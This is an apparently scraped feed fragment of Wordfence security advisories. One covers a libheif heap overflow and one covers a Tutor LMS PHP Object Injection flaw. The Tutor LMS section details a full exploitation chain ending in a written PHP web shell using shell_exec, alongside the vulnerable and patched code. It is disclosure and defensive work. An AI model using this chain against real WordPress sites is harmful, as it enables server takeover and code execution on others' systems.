<h2>Vulnerability Summary</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://github.com/strukturag/libheif/security/advisories/GHSA-x8r2-mggj-j6wr" target="_blank" rel="noopener">libheif &lt;= 1.23.2 – Heap Buffer Overflow to Arbitrary File Read and Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
                <span>CVSS Rating</span><br />
                <strong>9.8 (Critical)</strong>
            </div>
<div class="cve-id">
                <span>CVE-ID</span><br />
                <strong>CVE-2026-XXXXX</strong>
            </div>
<div class="affected-versions">
                <span>Affected Version(s)</span><br />
                <strong>1.18.0 – 1.23.2</strong>
            </div>
<div class="patched-status">
                <span>Patched Version</span><br />
                <strong class="patched">1.23.3</strong>
            </div>
</div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
                <strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://github.com/strukturag/libheif" target="_blank" rel="noopener">libheif</a> <span class="wfvr-software-slug">[strukturag/libheif]</span></div>
</div>
<div class="col-12 col-md-5 researchers">
                <strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start">
                        <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"></a><br />
                        <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a>
                    </div>
<div class="mt-1 d-flex align-items-start">
                        <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><br />
                        <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>
                    </div>
</div>
</div>
</div>
<div class="vulnerability-description">libheif is vulnerable to a heap buffer overflow in the decoder for uncompressed images in versions 1.18.0 through 1.23.2 when built with <code>WITH_UNCOMPRESSED_CODEC=ON</code>. A crafted HEIC file can write attacker-controlled bytes past the end of a memory buffer. In affected applications and server configurations, this can result in arbitrary file read or remote code execution. The vulnerability is fixed in libheif 1.23.3; 1.23.4 is the current upstream release.</div>
</div>
<div class="footer">
        <a href="https://github.com/strukturag/libheif/security/advisories/GHSA-x8r2-mggj-j6wr" target="_blank" rel="noopener">More Details &gt;</a>
    </div>
</div>
<h2>How we found it</h2>
<p>We found this vulnerability with <strong>Wordfence Argus</strong>, our agentic adversarial testing framework, during a WordPress 7.1 security assessment.</p>
<p>The vulnerabilities that hurt WordPress sites don’t always live in WordPress itself. Some of them live several layers down, in shared libraries that site owners never chose on their own, reached by a feature as mundane as uploading a holiday photo. Defending the platform properly means following the data all the way down. You can read more about Argus in <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-moving-beyond-human-research-capability/" target="_blank" rel="noopener">our earlier post</a>.</p>
<p>Our mission is to secure WordPress through defense in depth, which is why we are investing in proactive vulnerability research of this kind alongside our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to our multi-layered approach to security.</p>
<h2>How the bug actually works</h2>
<p>You don’t need to know C++ to follow this.</p>
<p><strong>A color photo is stored as three separate pictures.</strong> One holds brightness. The other two hold color, one for how blue each part of the picture is and one for how red. Human eyes notice detail in brightness far more than detail in color, so the two color pictures can be stored at lower resolution and nobody sees the difference. In the file’s own vocabulary, each of these is called a plane.</p>
<p><strong>Each plane declares how much space its dots need.</strong> This is called bit depth. Eight bits per dot is ordinary and takes one byte of memory. Sixteen bits gives finer gradations and takes two bytes. The format lets each plane declare its own depth, which is a reasonable feature, because the same format carries scientific and sensor images where the parts really do differ in precision.</p>
<p>A program reading an image asks the system for a block of memory big enough to hold it. That block is a buffer. If the program writes more data than the buffer can hold, the extra spills into memory beyond the buffer, which may contain other data or bookkeeping used by the program. That is dangerous because corrupting nearby memory can change how the program behaves. If an attacker can control what gets written, they may sometimes be able to steer the program into running code of their choosing. This is a <strong>buffer overflow</strong>.</p>
<p>In 1.23.2, libheif sizes each plane’s buffer from that plane’s own declared depth, which is correct. A file declaring sixteen-bit blue and eight-bit red gets a two-byte-per-dot buffer for blue and a one-byte-per-dot buffer for red.</p>
<p>The issue lies in the way the picture is written in. The two color planes are stored woven together in the file, one dot of each, alternating across the row, so a single loop fills both buffers at once. <strong>That loop looks up how wide a dot is only once, from whichever color plane the file lists first.</strong></p>
<p>So with sixteen-bit blue listed first, the loop takes two bytes as the width and writes two-byte dots into both buffers. Blue’s buffer can take them. <strong>Red’s is sized for one-byte dots, so every dot written into it is twice the size it should be and lands twice as far along.</strong> Each row overruns into the row beneath it, <strong>and the last row runs past the end of the buffer into memory belonging to something else</strong>.</p>
<p><strong>The bytes that spill out come from the image file, so whoever made the file chooses what gets written there.</strong> The amount that spills grows with the image’s declared dimensions. In the maintainer’s own words, <em>“both the written bytes and the overflow length are controlled by the file.”</em></p>
<p>The mistake is visible in the record libheif keeps for each plane:</p>
<pre class="brush: cpp; title: ; notranslate">
uint8_t* dst_plane;                      // this plane's memory
uint8_t* other_chroma_dst_plane;         // the paired plane's memory
size_t   dst_plane_stride;               // this plane's row length
size_t   other_chroma_dst_plane_stride;  // the paired plane's row length
uint32_t bytes_per_component_sample;     // one of these, for both planes
</pre>
<p>The record carries two pointers and two row lengths, but only one width. The code assumes both color planes use the same depth, and the file is allowed to declare that they don’t.</p>
<p><em>NOTE: Directly above this loop is a comment describing a different out-of-bounds write in the same function that was fixed a few months earlier. The same code had already been patched once for writing past the end of a color plane.</em></p>
<h2>Timeline</h2>
<div>
<div>
<div>2026-08-28</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Wordfence Argus discovered the vulnerability</div>
<div>Wordfence Argus discovered the vulnerability during a WordPress 7.1 assessment. We reproduced it against official libheif 1.23.2 with a sanitizer build and a matched control file, confirmed a second affected build, demonstrated impact on a clean WordPress installation, and reported it to the libheif maintainer through GitHub’s private vulnerability reporting.</div>
</div>
</div>
<div>
<div>2026-08-31</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Maintainer committed a fix</div>
</div>
</div>
<div>
<div>2026-09-01</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Patched release and advisory published</div>
<div>libheif 1.23.3 was released and the advisory was published.</div>
</div>
</div>
<div>
<div>2026-09-02</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Follow-up research</div>
<div>Follow-up research to measure reliability across versions and build configurations.</div>
</div>
</div>
</div>
<div>
    <span><i></i> Wordfence action</span><br />
    <span><i></i> Vendor / external action</span>
</div>
<h2>Conclusion</h2>
<p><strong><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a> found a critical heap buffer overflow in libheif 1.18.0 through 1.23.2, several layers beneath an ordinary WordPress image upload.</strong> We did not stop after making the vulnerable library crash. On one exact WordPress deployment, we demonstrated that a crafted HEIC file could be turned into reading protected files and executing code on the server.</p>
<p>This finding is separate from the vulnerabilities featured in <a href="https://heif-heist.com/" target="_blank" rel="noopener">HEIF Heist</a>, but it reinforces the same real-world lesson. An exploit may need to be tailored to its target, yet that work can be done quickly and may carry across other servers built the same way. Our finding is also newer: it remained present in libheif 1.23.2, the release that fixed two critical HEIF Heist vulnerabilities, and was not fixed until 1.23.3.</p>
<p>This is exactly why we built Wordfence Argus. Securing WordPress means looking beyond WordPress Core and plugins, then following untrusted data through every layer that handles it. In this case, Argus followed a photo upload into a system library most site owners did not know they were running, found a critical vulnerability, and gave our researchers a path to prove what it could mean on a real server, WordPress or otherwise.</p>
<p><a href="https://www.wordfence.com/blog/2026/09/wordfence-argus-discovers-critical-vulnerability-in-libheif-the-library-that-opens-iphone-photos-on-your-server/#tldr" target="_blank" rel="noopener">Whether you’re vulnerable depends on your libheif version and how it was built</a>. Check Site Health for HEIC support, install your operating system or hosting provider’s fixed package, restart affected services, and rebuild container images from an updated base. If you can’t update yet, block HEIC and HEIF file types.</p>
<p>Our thanks go to Dirk Farin, who released the fix in four days.</p>
<p>If you know someone running a site that accepts image uploads, please share this advisory with them.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-argus-discovers-critical-vulnerability-in-libheif-the-library-that-opens-iphone-photos-on-your-server/" target="_blank" rel="noopener">Wordfence Argus Discovers Critical Vulnerability in libheif, the Library That Opens iPhone Photos on Your Server</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>100,000 WordPress Sites Exposed to Remote Code Execution via PHP Object Injection Vulnerability Found by Wordfence Argus in Tutor LMS</title>
		<link>https://swiftupdates.ca/100000-wordpress-sites-exposed-to-remote-code-execution-via-php-object-injection-vulnerability-found-by-wordfence-argus-in-tutor-lms/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 17 Sep 2026 21:38:57 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/100000-wordpress-sites-exposed-to-remote-code-execution-via-php-object-injection-vulnerability-found-by-wordfence-argus-in-tutor-lms/</guid>

					<description><![CDATA[On August 23rd, 2026, Wordfence Argus, our AI research agent specializing in complex vulnerability chains, discovered a PHP Object Injection vulnerability in Tutor LMS, a WordPress e-learning plugin active on more than 100,000 websites. This vulnerability allows any authenticated attacker with subscriber-level access to achieve remote code execution on the server by exploiting an interaction [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 23rd, 2026, <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/7733" target="_blank" rel="noopener noreferrer">Wordfence Argus</a>, our AI research agent specializing in complex vulnerability chains, discovered a PHP Object Injection vulnerability in Tutor LMS, a WordPress e-learning plugin active on more than 100,000 websites. This vulnerability allows any authenticated attacker with subscriber-level access to achieve remote code execution on the server by exploiting an interaction between WordPress’s database abstraction layer and PHP’s serialization engine. Because Tutor LMS is built around student enrollment and most installations enable open registration by default, the authentication bar is effectively low for any visitor who can reach the site.</p>
<p>Our mission is to secure WordPress through defense in depth, which is why we are investing in proactive vulnerability research of this kind alongside our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener noreferrer">Bug Bounty Program</a>. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to our multi-layered approach to security.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability on August 25, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later, on September 24, 2026.</p>
<p>We sent full disclosure details to the Themeum team through our <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener noreferrer">Wordfence Vulnerability Management Portal</a> on August 23, 2026, the same day we received and validated the report. The Themeum team acknowledged the vulnerability on August 24, 2026, and released a fully patched version, 4.0.8, on September 10, 2026. We would like to commend the Themeum team for their prompt response and timely patch.</p>
<p>We urge users to update their sites with the latest patched version of Tutor LMS, version 4.0.8 at the time of this publication, as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0077d56-11e7-4e74-abe0-63e81db67be3" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.7 &#8211; Authenticated (Subscriber+) PHP Object Injection to Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78175" target="_blank" rel="noopener noreferrer">							CVE-2026-78175						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 4.0.7</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">4.0.8</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.0.7 via the `withdraw_method_field` parameter of the `tutor_save_withdraw_account` AJAX handler. This is due to the handler lacking any capability or role check, relying solely on a nonce, while also passing attacker-supplied values through `esc_sql()`, which replaces every `%` character with a 66-byte HMAC placeholder token before the data is serialized and stored via `update_user_meta()`; when the meta is later retrieved, the placeholder is collapsed back to a single `%`, leaving serialized string length declarations 65 bytes greater than the actual content, and because array keys originate from entirely unescaped POST field names, `unserialize()` over-reads into attacker-controlled bytes, allowing injection of an arbitrary serialized object stream. This makes it possible for authenticated attackers, with subscriber-level access and above, to achieve remote code execution on the server by triggering the `GuzzleHttpCookieFileCookieJar` POP chain, reachable via the `spl_autoload_register` loader in `TUTORRestAPI` which loads the plugin&#8217;s own bundled PayPal Composer autoloader, writing attacker-controlled content to an attacker-specified filename. This has an unauthenticated pathway when user registration is enabled, which is common for students and teachers to register, and it requires the monetization feature to be enabled.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0077d56-11e7-4e74-abe0-63e81db67be3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>Unfortunately, insecure implementation of the plugin’s withdraw account management feature allows for PHP Object Injection leading to remote code execution. The vulnerability spans four components across the plugin, exploits an obscure interaction inside WordPress core’s database abstraction layer, and terminates in a destructor method of a bundled third-party library.</p>
<p>The entry point is the <code>tutor_save_withdraw_account</code> AJAX handler, registered in <code>classes/Withdraw.php</code>. As shown on line 44 of <code>Withdraw.php</code>, the handler is registered using the <code>wp_ajax_</code> hook only — the authenticated hook — with no corresponding capability check anywhere in the handler body:</p>
<pre class="brush: php; first-line: 43; title: ; notranslate">
public function __construct() {
    add_action( 'wp_ajax_tutor_save_withdraw_account', array( $this, 'tutor_save_withdraw_account' ) );
    add_action( 'wp_ajax_tutor_make_an_withdraw', array( $this, 'tutor_make_an_withdraw' ) );
    add_filter( 'tutor_withdrawal_methods_all', array( $this, 'withdraw_methods_all' ) );
    add_filter( 'tutor_withdrawal_methods_available', array( $this, 'withdraw_methods_available' ) );
}
</pre>
<p>The handler’s only access gate is a nonce check via <code>tutor_utils()-&gt;checking_nonce()</code> on line 195. That nonce is emitted on every frontend page load via <code>wp_localize_script</code> in <code>classes/Assets.php</code>, meaning any logged-in subscriber can obtain a valid <code>_tutor_nonce</code> simply by loading the homepage.</p>
<p>On a typical Tutor LMS site that allows open student registration, an anonymous visitor can self-register as a subscriber via the <code>tutor_register_student</code> action and immediately obtain this nonce, giving them everything they need to reach the vulnerable handler. Notably, the sibling handler <code>tutor_make_an_withdraw</code> does enforce an <code>is_instructor()</code> capability check; the absence of the same check on <code>tutor_save_withdraw_account</code> is what leaves this path open to any subscriber.</p>
<p>Attacker-controlled data flows in through <code>$_POST['withdraw_method_field'][$method]</code>, retrieved on line 204 via <code>tutor_utils()-&gt;avalue_dot()</code>. The keys of this associative array, the <code>$input_name</code> values, come entirely from POST field names and are never sanitized or constrained. The values are then processed on line 213:</p>
<pre class="brush: php; first-line: 204; title: ; notranslate">
$method_data               = tutor_utils()-&gt;avalue_dot( 'withdraw_method_field.' . $method, $_POST );
$available_withdraw_method = $this-&gt;withdraw_methods_all();
if ( tutor_utils()-&gt;count( $method_data ) ) {
    $saved_data                         = array();
    $saved_data['withdraw_method_key']  = $method;
    $saved_data['withdraw_method_name'] = tutor_utils()-&gt;avalue_dot( $method . '.method_name', $available_withdraw_method );
    foreach ( $method_data as $input_name =&gt; $value ) {
        $saved_data[ $input_name ]['value'] = esc_sql( sanitize_text_field( $value ) );
        $saved_data[ $input_name ]['label'] = tutor_utils()-&gt;avalue_dot( $method . ".form_fields.{$input_name}.label", $available_withdraw_method );
    }

    update_user_meta( $user_id, '_tutor_withdraw_method_data', $saved_data );
}
</pre>
<p>The root cause is the misuse of <code>esc_sql()</code> on a value destined for <code>update_user_meta()</code> rather than a raw database query string. <code>esc_sql()</code> internally calls <code>wpdb::add_placeholder_escape()</code>, which replaces every literal <code>%</code> character with a 66-byte HMAC-keyed placeholder token. This is a WordPress internal safety mechanism designed to prevent <code>%</code> characters from being misinterpreted as printf-style format specifiers in <code>$wpdb-&gt;prepare()</code>. When a value like <code>AAAA%z</code> passes through <code>esc_sql()</code>, it becomes a 71-character string in memory. <code>update_user_meta()</code> then calls <code>maybe_serialize()</code> on the entire <code>$saved_data</code> array, faithfully serializing this inflated string as <code>s:71:"AAAA{token}z"</code>.</p>
<p>Here is the twist that turns this into a length desync. WordPress strips those placeholder tokens back out of every query immediately before execution, <code>wpdb</code> registers <code>remove_placeholder_escape()</code> on the <code>query</code> filter at priority 0, so it runs on the <code>UPDATE</code> statement that writes the user meta. As the row is written, the 66-byte token collapses back to a single <code>%</code> character in place, inside the already-serialized string. What actually lands in the database is <code>s:71:"AAAA%z"</code>, a serialized string token that declares a length of 71 bytes but whose actual content is only 6 bytes. The corruption is baked into storage on write; the payload detonates the next time that blob is unserialized on read.</p>
<p>When <code>maybe_unserialize()</code> later hands this string to PHP’s <code>unserialize()</code>, the parser reads 71 bytes starting from the opening quote, over-reading 65 bytes past the end of <code>AAAA%z</code> and into the next array element. Because the keys of <code>$saved_data</code> come from unescaped POST field names that the attacker controls entirely, the attacker can craft a second array key whose content is a well-formed serialized object stream. After the 65-byte over-read consumes the attacker’s padding, the parser resumes execution on the injected payload.</p>
<p>Detonation requires only that the corrupted blob be unserialized, and sending the same request a second time is sufficient to cause it. On the first request, the corrupted user meta is written to the database. On the second request, the plugin’s <code>update_user_meta()</code> call invokes WordPress core’s <code>update_metadata()</code>, which to determine whether the value has actually changed, reads the previously-stored value via <code>get_metadata_raw()</code>, and <code>get_metadata_raw()</code> runs <code>maybe_unserialize()</code> on it.</p>
<p>That core-internal <code>maybe_unserialize()</code> on the corrupted blob materializes the attacker’s injected objects. The corrupted meta is equally a latent landmine for any other reader: <code>WithdrawModel::get_user_withdraw_method()</code> runs <code>get_user_meta( $user_id, '_tutor_withdraw_method_data', true )</code> → <code>maybe_unserialize()</code>, and it is invoked both by the <code>tutor_make_an_withdraw</code> handler and whenever the withdrawal dashboard or account settings page is rendered, so simply viewing the withdrawal page also detonates the payload.</p>
<p>The injected payload is a two-element array. The first element references the class name <code>ecommercePaymentGatewaysPaypalvendorautoload</code>, not a real class, but a name crafted so that when <code>unserialize()</code> tries to resolve it, the plugin’s registered autoloader maps the name to a filesystem path and includes, via <code>require_once</code>(), the corresponding file. The plugin registers a custom <code>spl_autoload_register</code> callback in <code>classes/RestAPI.php</code>:</p>
<pre class="brush: php; first-line: 190; title: ; notranslate">
private function loader( $class_name ) {
    if ( ! class_exists( $class_name ) ) {
        $class_name = preg_replace( array( '/([a-z])([A-Z])/', '/\\/' ), array( '$1$2', DIRECTORY_SEPARATOR ), $class_name );
        $class_name = str_replace( 'TUTOR' . DIRECTORY_SEPARATOR, 'restapi' . DIRECTORY_SEPARATOR, $class_name );
        $file_name  = $this-&gt;path . $class_name . '.php';

        if ( file_exists( $file_name ) ) {
            require_once $file_name;
        }
    }
}
</pre>
<p>This loader translates the class name <code>ecommercePaymentGatewaysPaypalvendorautoload</code> into a filesystem path and, because the file exists in the plugin directory, it includes, via <code>require_once</code>(), the bundled PayPal Composer autoloader at <code>ecommerce/PaymentGateways/Paypal/vendor/autoload.php</code>. That Composer autoloader in turn registers the <code>GuzzleHttp*</code> class hierarchy, making the second injected object, a genuine <code>GuzzleHttpCookieFileCookieJar</code>, fully materializable.</p>
<p>When PHP’s garbage collector destroys the deserialized <code>FileCookieJar</code> instance, its <code>__destruct()</code> method calls <code>save()</code>, which calls <code>file_put_contents( $this-&gt;filename, json_encode( $this-&gt;cookies ) )</code>. Because the attacker controls both <code>$this-&gt;filename</code> (set to a <code>.php</code> path under <code>wp-content/uploads</code>) and the cookie <code>Name</code> property of a contained <code>SetCookie</code> object (set to a <code>&lt;?php echo shell_exec(...); ?&gt;</code> payload), the destructor writes a PHP web shell to disk. Any subsequent HTTP request to that path executes arbitrary operating system commands as the web server user, completing a full remote code execution chain reachable by any subscriber-level user.</p>
<h2>The Patch</h2>
<p>The Themeum team patched this vulnerability in version 4.0.8 with a set of changes to <code>tutor_save_withdraw_account()</code> in <code>classes/Withdraw.php</code> that address multiple layers of the attack chain simultaneously. The most important addition is a proper capability check immediately after the nonce verification, ensuring the handler is only reachable by instructors:</p>
<pre class="brush: php; first-line: 195; title: ; notranslate">
// Checking nonce.
tutor_utils()-&gt;checking_nonce();
$user_id = get_current_user_id();

// Withdraw account settings are for instructors only.
if ( ! tutor_utils()-&gt;is_instructor( $user_id ) ) {
    wp_send_json_error( array( 'msg' =&gt; tutor_utils()-&gt;error_message() ) );
}
</pre>
<p>This single addition closes the subscriber-level access pathway. The patch also removes <code>esc_sql()</code> from the value-sanitization path, the direct root cause of the length-desync primitive, replacing it with <code>sanitize_text_field()</code> and <code>sanitize_email()</code> applied after <code>wp_unslash()</code>, none of which introduce serialization-corrupting length inflation.</p>
<p>Critically, the patch introduces a strict whitelist for array keys: the loop now iterates over <code>$form_fields</code> (the plugin’s own declared field definitions for the chosen withdrawal method) rather than over the attacker-supplied <code>$method_data</code>, and only accepts keys present in both. This prevents an attacker from injecting arbitrary keys into the serialized payload regardless of the value-handling path. Finally, the method name is validated against the plugin’s list of available withdrawal methods before any field processing occurs:</p>
<pre class="brush: php; first-line: 217; title: ; notranslate">
$form_fields = $available_withdraw_method[ $method ]['form_fields'] ?? array();
if ( ! is_array( $form_fields ) || empty( $form_fields ) ) {
    wp_send_json_error();
}

$method_data = tutor_utils()-&gt;avalue_dot( 'withdraw_method_field.' . $method, $_POST );
if ( ! is_array( $method_data ) || ! tutor_utils()-&gt;count( $method_data ) ) {
    wp_send_json_error();
}

$saved_data                         = array();
$saved_data['withdraw_method_key']  = $method;
$saved_data['withdraw_method_name'] = $available_withdraw_method[ $method ]['method_name'] ?? '';

foreach ( $form_fields as $input_name =&gt; $field ) {
    if ( ! array_key_exists( $input_name, $method_data ) ) {
        continue;
    }
    $raw_value = $method_data[ $input_name ];
    if ( is_array( $raw_value ) ) {
        continue;
    }

    $field_type = $field['type'] ?? 'text';
    $value      = 'email' === $field_type
        ? sanitize_email( wp_unslash( $raw_value ) )
        : sanitize_text_field( wp_unslash( $raw_value ) );

    $saved_data[ $input_name ] = array(
        'value' =&gt; $value,
        'label' =&gt; $field['label'] ?? '',
    );
}
</pre>
<p>Together, these changes address the vulnerability at four independent points: the authentication gate, the serialization corruption source, the key injection vector, and the method validation bypass. Any one of the first three changes alone would have been sufficient to block exploitation; shipping all of them in a single patch demonstrates thorough remediation. A key highlight of defense in depth applied as a patch.</p>
<h2>Disclosure Timeline</h2>
<div>
<div>
<div>2026-08-23</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/7733" target="_blank" rel="noopener noreferrer">Wordfence Argus</a>, our automated research agent specializing in complex vulnerability chains, identified the PHP Object Injection vulnerability in Tutor LMS, and the Wordfence Threat Intelligence team validated it the same day</div>
</div>
</div>
<div>
<div>2026-08-23</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Full disclosure details were sent to the Themeum team through our <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener noreferrer">Wordfence Vulnerability Management Portal</a></div>
</div>
</div>
<div>
<div>2026-08-24</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>The Themeum team acknowledged the report and began working on a fix</div>
</div>
</div>
<div>
<div>2026-08-25</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Response</a> users received a firewall rule to provide added protection against any exploits targeting this vulnerability</div>
</div>
</div>
<div>
<div>2026-09-10</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>The Themeum team released Tutor LMS version 4.0.8, which fully addresses the vulnerability</div>
</div>
</div>
<div>
<div>2026-09-11</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Wordfence published this advisory to inform the broader WordPress community</div>
</div>
</div>
<div>
<div>2026-09-24</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Wordfence free users receive the firewall rule</div>
</div>
</div>
</div>
<div><span><i></i> Wordfence action</span><br />
<span><i></i> Vendor / external action</span></div>
<h2>Conclusion</h2>
<p>In this blog post, we detailed a PHP Object Injection vulnerability within the Tutor LMS plugin affecting versions 4.0.7 and earlier. This vulnerability allows authenticated attackers with subscriber-level access to achieve remote code execution on the server by exploiting a serialization length-desync primitive and a POP chain terminating in the plugin’s bundled GuzzleHttp library. The vulnerability has been fully addressed in version 4.0.8 of the plugin.</p>
<p>We encourage all WordPress site owners running Tutor LMS to update to version 4.0.8 or later as soon as possible. Given that Tutor LMS sites commonly enable open student registration as a core part of their function, the effective authentication bar for exploitation is low on many affected installations, making this a high-priority update.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> users received a firewall rule to protect against any exploits targeting this vulnerability on August 25, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later, on September 24, 2026.</p>
<p>If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/100000-wordpress-sites-exposed-to-remote-code-execution-via-php-object-injection-vulnerability-found-by-wordfence-argus-in-tutor-lms/" target="_blank" rel="noopener">100,000 WordPress Sites Exposed to Remote Code Execution via PHP Object Injection Vulnerability Found by Wordfence Argus in Tutor LMS</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (September 7, 2026 to September 13, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-september-7-2026-to-september-13-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 17 Sep 2026 18:40:43 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-september-7-2026-to-september-13-2026/</guid>

					<description><![CDATA[Last week, there were 260 vulnerabilities disclosed in 207 WordPress Plugins that have been added to the Wordfence Intelligence Vulnerability Database, and there were 147 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with Wordfence Intelligence is to [&#8230;]]]></description>
